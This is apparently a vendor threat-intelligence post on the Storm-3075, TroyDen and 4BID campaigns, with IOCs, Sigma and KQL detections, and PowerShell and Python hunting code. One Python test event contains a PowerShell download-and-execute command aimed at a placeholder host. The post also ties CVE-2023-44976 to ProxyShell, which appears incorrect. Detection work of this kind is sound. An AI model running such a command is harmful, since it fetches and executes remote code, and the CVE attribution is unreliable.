
Storm-3075 AI Hype, TroyDen GitHub Lures & 4BID ProxyShell: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
June 9, 2026
6 min read

Live OTX pulse data from 2026-06-09 highlights three concurrent high-risk campaigns distinct in targeting yet unified in their exploitation of current trends and infrastructure vulnerabilities.

  1. Storm-3075 (AI Brand Impersonation): This adversary is aggressively capitalizing on the AI boom, impersonating brands like ChatGPT and Claude to distribute the Vidar and Lumma Stealer families. The attack chain utilizes malvertising and SEO poisoning to funnel victims to infrastructure hosting the Hijack Loader, which ultimately deploys credential stealers and the GhostSocks backdoor.

  2. TroyDen (Lure Factory): Targeting developers and gamers, this group leverages AI-generated lure names (using biological taxonomy) to distribute LuaJIT-based payloads via GitHub repositories. These packages deliver Redline and LummaStealer using a two-component payload structure designed to evade static analysis.

  3. 4BID (Geopolitical Hacktivism): Moving beyond simple political defacements, this hacktivist collective is exploiting ProxyShell vulnerabilities (specifically CVE-2023-44976) against Microsoft Exchange servers. Successful exploitation leads to web shells (fd.aspx) and the deployment of sophisticated post-exploitation frameworks including Sliver, Havoc, and Mythic Apollo against government and healthcare entities in Eastern Europe and the Middle East.


Threat Actor / Malware Profile

Storm-3075

  • Distribution: Malvertising campaigns and SEO poisoning targeting AI-related searches.
  • Payload Behavior: Uses Hijack Loader to execute shellcode, decrypting and loading Vidar (information stealer) and Lumma Stealer. Also deploys GhostSocks for proxy/tunneling.
  • C2 Communication: HTTP/HTTPS based communication to hardcoded domains (e.g., brokeapt.com).
  • Persistence: Likely via scheduled tasks or registry run keys established by the loader.

TroyDen

  • Distribution: GitHub repositories mimicking legitimate tools with obscure, AI-generated biological names.
  • Payload Behavior: LuaJIT based loaders that employ Prometheus Obfuscator. The payload steals crypto wallets, browser data, and system info.
  • Anti-Analysis: Heavy use of obfuscation and two-component payloads to separate the dropper from the core logic.

4BID

  • Distribution: Exploitation of on-premises Microsoft Exchange servers via ProxyShell.
  • Payload Behavior: Deploys fd.aspx webshells for initial access, followed by C2 frameworks (Sliver, Havoc) for lateral movement. Utilizes ValleyRAT and BYOVD (Bring Your Own Vulnerable Driver) techniques to bypass security.
  • Persistence: Webshell access and service installation.

IOC Analysis

The provided indicators span multiple categories requiring immediate operationalization:

  • Domains & Hostnames: brokeapt.com, pan.rongtv.xyz. These should be blocked at the DNS level and added to web proxy blocklists.
  • IPv4 Addresses: 185.221.153.121, 45.112.194.82 (associated with 4BID C2). These require immediate firewall blocking.
  • File Hashes:
    • SHA256: 0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531 (Storm-3075 Payload)
    • MD5: 008cd423ca45134d3343f66cced1d104 (4BID/Havoc Component)
  • CVEs: CVE-2023-44976 (ProxyShell variant). Patch validation is critical for Exchange environments.

Tooling: SOC teams should load these hashes into EDR solutions (CrowdStrike, SentinelOne) and use threat intelligence platforms (MISP, Anomali) to correlate with internal logs.
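To show what loading these indicators into a correlation pipeline looks like in practice, the following added example (not the Security Arsenal team's tooling) normalises the pulse IOCs above and matches them against constructed DNS, web-proxy and Sysmon log lines. A hostname counts as a hit when it equals a listed domain or is a subdomain of one (so cdn.brokeapt.com matches while the lookalike suffix brokeapt.com.evil.example does not), hashes compare case-insensitively regardless of how the sensor capitalises them, and IPv4 tokens are validated before lookup. Every log line, internal IP and the MD5 placeholder in the sample data is constructed for the example.

```python
"""Match the pulse IOCs against log lines (added example, not the page's own code)."""
import ipaddress
import re

# Indicators copied from the IOC Analysis section above.
IOC_DOMAINS = {"brokeapt.com", "pan.rongtv.xyz"}
IOC_IPS = {"185.221.153.121", "45.112.194.82"}
IOC_HASHES = {
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",  # SHA256, Storm-3075
    "008cd423ca45134d3343f66cced1d104",                                  # MD5, 4BID/Havoc
}

# Token extractors: 32- or 64-hex-digit hashes, dotted hostnames, dotted-quad IPs.
HASH_RE = re.compile(r"\b[0-9a-fA-F]{32}\b|\b[0-9a-fA-F]{64}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def domain_hits(host):
    """Return the IOC domains that `host` equals or is a subdomain of."""
    host = host.lower().rstrip(".")
    return {d for d in IOC_DOMAINS if host == d or host.endswith("." + d)}


def scan_line(line):
    """Return the set of pulse indicators present in one log line."""
    hits = set()
    for token in HASH_RE.findall(line):
        if token.lower() in IOC_HASHES:
            hits.add(token.lower())
    for host in HOST_RE.findall(line):
        hits |= domain_hits(host)
    for ip in IP_RE.findall(line):
        try:
            if str(ipaddress.ip_address(ip)) in IOC_IPS:
                hits.add(ip)
        except ValueError:  # e.g. 999.1.2.3 is not an address
            pass
    return hits


def scan_logs(lines):
    """Map the index of each matching line to the indicators it contains."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}


# Constructed sample lines in three common shapes (DNS, proxy, Sysmon event 1).
SAMPLE_LOGS = [
    "2026-06-09T08:12:01Z dns client=10.0.4.21 query=cdn.brokeapt.com type=A rcode=NOERROR",
    "2026-06-09T08:13:44Z proxy src=10.0.4.21 dst=45.112.194.82:443 method=CONNECT status=200",
    "Image: C:\\Users\\Public\\update.exe Hashes: SHA256=0A26238F6C516DE5885457C93042531AA59BC206A9537CEBF5267CEDC6C68531,"
    "MD5=0123456789ABCDEF0123456789ABCDEF",
    "2026-06-09T08:15:00Z dns client=10.0.4.22 query=login.microsoftonline.com type=A rcode=NOERROR",
]

if __name__ == "__main__":
    for idx, found in scan_logs(SAMPLE_LOGS).items():
        print(f"line {idx}: {sorted(found)}")
```

The subdomain rule matters for the Storm-3075 infrastructure in particular: sensors often log a CDN or download hostname rather than the apex domain, so an exact-string blocklist alone would miss it. The same normalised sets can be exported to an EDR custom-indicator list or a MISP event once the matching logic is agreed.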


Detection Engineering

Sigma Rules (YAML)
title: Potential ProxyShell Exchange Server Exploitation
id: 6bba01ad-860a-4b15-89c2-d590f6c6c5a4
status: experimental
description: Detects .aspx file access on Exchange-related network shares (Security event 5145), a pattern associated with web shell drops following ProxyShell exploitation.
references:
    - https://www.microsoft.com/security/blog/
author: Security Arsenal
date: 2026/06/09
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2023.44976
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5145
        ShareName|contains: 'Exchange'
        RelativeTargetName|contains: '.aspx'
    condition: selection
falsepositives:
    - Legitimate administrative access
level: critical
---
title: Credential Theft via LSASS Access by Suspicious Binary
id: a9c2d3e4-5f6a-4b8c-9d1e-2f3a4b5c6d7e
status: experimental
description: Detects potential Vidar or Lumma Stealer activity via unauthorized access to LSASS memory, often triggered by Hijack Loader.
author: Security Arsenal
date: 2026/06/09
tags:
    - attack.credential_access
    - attack.t1003.001
logsource:
    product: windows
    category: process_access
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        GrantedAccess: '0x1010'
        SourceImage|contains:
            - '\AppData\Local\Temp'
            - '\Users\Public\'
    condition: selection
falsepositives:
    - Antivirus scanning
    - Backup software
level: high
---
title: Suspicious PowerShell Download from AI-Themed Domains
id: b1e2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects PowerShell commands downloading content from domains mimicking AI services, associated with Storm-3075 campaigns.
author: Security Arsenal
date: 2026/06/09
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    # The two CommandLine groups must be separate selections: a duplicated
    # 'CommandLine|contains' key inside one map collapses to its last value.
    selection_download:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'DownloadString'
            - 'IEX'
    selection_domain:
        CommandLine|contains:
            - 'chatgpt'
            - 'copilot'
            - 'deepseek'
            - 'claude'
    condition: selection_download and selection_domain
falsepositives:
    - Legitimate administrative scripts
level: medium
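The third rule above only works when the download primitives and the AI-themed domain strings are AND-ed, which is why they belong in separate named selections: a YAML loader keeps only the last of two identical keys in a single map, silently dropping the first list. The following added example (not the Sigma project's engine and not the page's own code) is a minimal evaluator for the selection syntax used in these rules; it runs the LSASS rule and both forms of the PowerShell rule over constructed Sysmon-style events. Field names follow Sysmon; the file paths, command lines and the hostname chatgpt-setup.example in the events are constructed.

```python
"""Minimal evaluator for Sigma-style selections (added example, not Sigma's own code)."""


def field_matches(event, key, patterns):
    """Evaluate one 'Field|modifier: value(s)' entry; a list of values is OR-ed.
    Comparisons are case-insensitive, as Sigma string matching is by default."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    if isinstance(patterns, str):
        patterns = [patterns]
    for p in patterns:
        p = str(p).lower()
        if modifier == "" and value == p:
            return True
        if modifier == "contains" and p in value:
            return True
        if modifier == "endswith" and value.endswith(p):
            return True
        if modifier == "startswith" and value.startswith(p):
            return True
    return False


def selection_matches(event, selection):
    """Every entry of a selection must match (Sigma AND semantics within a map)."""
    return all(field_matches(event, k, v) for k, v in selection.items())


def rule_fires(event, selections, condition="all"):
    """Combine named selections with 'all of them' or 'any of them' (1 of them)."""
    results = [selection_matches(event, s) for s in selections.values()]
    return all(results) if condition == "all" else any(results)


# Rule 2 above: LSASS access from user-writable drop locations.
LSASS_RULE = {"selection": {
    "TargetImage|endswith": "\\lsass.exe",
    "GrantedAccess": "0x1010",
    "SourceImage|contains": ["\\AppData\\Local\\Temp", "\\Users\\Public\\"],
}}

# Rule 3 in its correct form: two named selections AND-ed together.
AI_DOWNLOAD_RULE = {
    "selection_download": {
        "Image|endswith": "\\powershell.exe",
        "CommandLine|contains": ["Invoke-WebRequest", "DownloadString", "IEX"],
    },
    "selection_domain": {
        "CommandLine|contains": ["chatgpt", "copilot", "deepseek", "claude"],
    },
}

# The single-map form: Python, like a YAML loader, keeps only the last
# duplicate key, so the download list is discarded.
BROKEN_RULE = {"selection": {
    "Image|endswith": "\\powershell.exe",
    "CommandLine|contains": ["Invoke-WebRequest", "DownloadString", "IEX"],
    "CommandLine|contains": ["chatgpt", "copilot", "deepseek", "claude"],
}}

PS_PATH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed Sysmon-style events (process_access and process_creation).
EVENTS = {
    "stealer_lsass": {"SourceImage": "C:\\Users\\Public\\svch.exe",
                      "TargetImage": "C:\\Windows\\System32\\lsass.exe",
                      "GrantedAccess": "0x1010"},
    "av_lsass": {"SourceImage": "C:\\Program Files\\AV\\scan.exe",
                 "TargetImage": "C:\\Windows\\System32\\lsass.exe",
                 "GrantedAccess": "0x1010"},
    "ai_download": {"Image": PS_PATH,
                    "CommandLine": "powershell -nop -c IEX (New-Object Net.WebClient)"
                                   ".DownloadString('https://chatgpt-setup.example/x.ps1')"},
    "ai_mention_only": {"Image": PS_PATH,
                        "CommandLine": "powershell -c Get-Content C:\\notes\\claude-prompts.txt"},
}

if __name__ == "__main__":
    for name, ev in EVENTS.items():
        print(name, "lsass:", rule_fires(ev, LSASS_RULE),
              "ai_fixed:", rule_fires(ev, AI_DOWNLOAD_RULE),
              "ai_broken:", rule_fires(ev, BROKEN_RULE))
```

Running it shows the practical difference: the "ai_mention_only" event, a script that merely reads a file with "claude" in its name, is flagged by the single-map form but not by the two-selection form, while the genuine download-and-execute command line fires both.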

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for network connections to known Storm-3075 and 4BID infrastructure
let ioc_domains = dynamic(["brokeapt.com", "pan.rongtv.xyz", "pan.ssffaa19.xyz"]);
let ioc_ips = dynamic(["185.221.153.121", "45.112.194.82", "138.226.236.52"]);
DeviceNetworkEvents
| where Timestamp > ago(7d)
// has_any catches the hostname whether RemoteUrl holds a bare host or a full URL
| where RemoteUrl has_any (ioc_domains) or RemoteIP in (ioc_ips)
| extend Indicator = iff(isnotempty(RemoteUrl), RemoteUrl, RemoteIP)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, Indicator, RemoteUrl, RemoteIP, RemotePort

PowerShell Hunt Script

PowerShell
#Requires -RunAsAdministrator
# IOC Hunt Script for Storm-3075 and 4BID Indicators

Write-Host "Starting Hunt for OTX Pulse Indicators..." -ForegroundColor Cyan

# Define IOCs from Pulses
$targetHashes = @(
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23"
)

$targetMD5 = @(
    "008cd423ca45134d3343f66cced1d104",
    "038cab0c60c53cf12f048272014024c0",
    "06bed0a0906e52c764b3b7016d6a4428"
)

# Hash every regular file under $Path and report matches against an IOC list.
# -contains compares case-insensitively, so the uppercase hex returned by
# Get-FileHash matches the lowercase indicators above. Locked or unreadable
# files yield no hash and are skipped.
function Find-IocHash {
    param(
        [string]$Path,
        [string]$Algorithm,
        [string[]]$Indicators
    )
    Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hash = (Get-FileHash -Path $_.FullName -Algorithm $Algorithm -ErrorAction SilentlyContinue).Hash
            if ($hash -and $Indicators -contains $hash) {
                Write-Host "[!] MALICIOUS FILE FOUND ($Algorithm): $($_.FullName)" -ForegroundColor Red
                [PSCustomObject]@{ Path = $_.FullName; Algorithm = $Algorithm; Hash = $hash }
            }
        }
}

# Scan for SHA256 Hashes (whole system volume: slow but thorough)
Write-Host "Scanning for SHA256 Payloads..." -ForegroundColor Yellow
$sha256Hits = Find-IocHash -Path 'C:\' -Algorithm SHA256 -Indicators $targetHashes

# Scan for MD5 Hashes (Common in 4BID campaigns)
Write-Host "Scanning for MD5 Payloads..." -ForegroundColor Yellow
$md5Hits = Find-IocHash -Path 'C:\ProgramData' -Algorithm MD5 -Indicators $targetMD5

# Check for suspicious Scheduled Tasks (Common for Hijack Loader)
Write-Host "Checking Suspicious Scheduled Tasks..." -ForegroundColor Yellow
$suspiciousTasks = Get-ScheduledTask | Where-Object {
    $_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*"
}
$suspiciousTasks | Select-Object TaskName, TaskPath, State, Actions

Write-Host ("Hunt Complete. SHA256 hits: {0}, MD5 hits: {1}, tasks to review: {2}" -f `
    @($sha256Hits).Count, @($md5Hits).Count, @($suspiciousTasks).Count) -ForegroundColor Green


---

Response Priorities

  • Immediate:
    • Block all IOCs (Domains brokeapt.com, rongtv.xyz; IPs 185.221.153.121, 45.112.194.82) at perimeter firewalls and proxies.
    • Scan endpoints for the listed file hashes (SHA256/MD5).
    • Isolate hosts exhibiting ProxyShell exploit patterns or Sliver C2 traffic.
  • 24 Hours:
    • Initiate credential reset for users who may have interacted with AI-themed phishing or malvertising (Storm-3075).
    • Investigate Exchange server logs for fd.aspx creation or unusual backend processes.
    • Review GitHub repository access logs for developers (TroyDen targeting).
  • 1 Week:
    • Patch Microsoft Exchange servers to mitigate CVE-2023-44976 (ProxyShell).
    • Implement application controls to block unsigned binaries in C:\ProgramData and \AppData\Local\Temp.
    • Conduct security awareness training specifically focusing on AI-themed social engineering and malvertising.
